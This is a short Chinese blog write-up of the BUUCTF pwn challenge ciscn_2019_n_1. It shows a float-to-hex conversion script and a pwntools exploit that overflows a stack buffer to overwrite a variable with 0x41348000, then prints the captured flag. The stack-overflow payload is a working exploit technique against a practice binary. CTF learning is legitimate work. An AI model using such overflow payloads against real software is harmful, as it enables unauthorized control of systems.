pwn学习(4)BUUCTF-ciscn_2019_n_1(浮点数转十六进制脚本积累)

checksec一下

IDA打开,如果满足的条件达成,就可以get flag

找到栈溢出漏洞,输入可以覆盖到v2

将代码11.28125在内存中的十六进制表示出来,

浮点数转十六进制代码如下:

复制代码
import struct

def float_to_hex(f):
    return hex(struct.unpack('<I',struct.pack('<f',f))[0])
print(float_to_hex(11.28125))
#output(0x41348000)

exp:

复制代码
from pwn import *

p=remote('node4.buuoj.cn',25860)

payload=b'a'*(0x30-0x4)+p32(0x41348000)
p.sendline(payload)

p.interactive()

运行出来的结果:

flag{8a5e8279-51a2-4b3b-8959-4d3f9b19227f}
总结:

脚本积累:浮点数转十六进制代码

相关推荐
从零开始的代码生活_7 小时前
C++ list 原理与实践:双向链表、迭代器与简化实现
开发语言·c++·后端·学习·算法·链表·list
二炮手亮子7 小时前
记录AI学习之路Day13:小模型(AI生成)
学习
程序员小八7778 小时前
从 0 学习 MySQL 索引——7 大核心精讲
android·学习·mysql
渣渣灰飞8 小时前
MySQL 系统学习 第六阶段:Redis + 缓存 + 高并发设计 第六章:Redis 实现登录 Token
学习·mysql·缓存
渣渣灰飞8 小时前
MySQL 系统学习 第六阶段:Redis + 缓存 + 高并发设计 第五章:缓存穿透、缓存击穿、缓存雪崩
学习·mysql·缓存
念何架构之路9 小时前
Docker 容器状态机 学习
java·学习·docker
你有我备注吗9 小时前
SQL学习之查询
java·sql·学习
从零开始的代码生活_9 小时前
C++ stack、queue 与 priority_queue:容器适配器原理与实战
开发语言·c++·后端·学习·算法
铅笔侠_小龙虾9 小时前
Rust 学习(6)-所有权规则、移动语义、Clone 与 Copy
python·学习·rust
kiss strong9 小时前
AI学习-langchain
学习·langchain